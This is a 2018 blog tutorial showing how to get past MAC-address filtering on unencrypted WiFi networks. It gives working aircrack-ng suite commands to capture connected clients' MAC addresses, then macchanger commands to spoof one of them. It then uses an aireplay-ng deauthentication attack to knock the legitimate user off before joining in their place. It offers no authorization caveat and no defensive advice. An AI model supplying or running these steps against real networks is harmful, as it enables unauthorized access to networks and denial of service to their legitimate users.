by hash3liZer . 04 June 2018
In this tutorial, we will see how a wireless network with no Encryption protocols at all protect itself by using an authorized list of users and how we can break through this. Basically, what we are talking about is MAC filtering. It's a feature that makes use of the provided list to permit a client, connecting to network.
Sometimes, when you go to a public place, a library or an educational institute, It's common for you to see encryptionless WiFi networks available to use for everyone. But it's not always true as you may have encountered this when you try to connect which just never happens. It's takes either too long for it to respond or either it just gets saved in your connected networks list.
So, this actually works after enabling MAC filter in the router preferences. The router is instructed to handle the nodes based on a MAC list, either it uses the list to dissociate clients or either to permit those clients. When a new connection is encountered, router firmware make decision for the client based on this list, if enabled.
So, basically what's protecting the network here is one's MAC address and which is always broadcasted either through the data frames and probe frames after a specific interval of time. Hence, available for us to see, copy and use.
The idea here is to first get the MAC addresses of all the connected clients. Occupy one of the client's MAC address. Dissociate her from the Access Point and connect to the WiFi.
Get the MAC addresses of all the connected devices with airodump-ng.
airmon-ng start wlan0 airodump-ng --bssid [ AP BSSID ] -c [ AP CHANNEL ] wlan0mon
Now, change your interface MAC address:
ifconfig wlan1 down macchanger -m [ new mac ] wlan1 ifconfig wlan1 up
Now, we have to disconnect the target client from the access point. Remember, a network cannot have two clients of same MAC addresses. The last layer of the network model is responsible for transferring data on the wire from one node to another which makes heavy use of MAC, uniquely assigned to a network adapter. This would create traffic problems when two users of same MAC try to communicate with other resources.
Hence, it is always suggested to kick off the target client before you connect to it.
aireplay-ng -00 -a [ AP MAC ] -c [ CLIENT MAC ] wlan0mon
Note the parameters:
Now, you can connect....
We've learnt how open wireless networks lead on people by using a filtered list of authorized users and how to keep others from connecting to it. Then we learnt that these devices broadcast their MAC addresses after specific intervals in the form of packets which we capture through the famous airodump-ng utility. Then we engaged in with a client by occupying her MAC address, kicked her out and connected to network.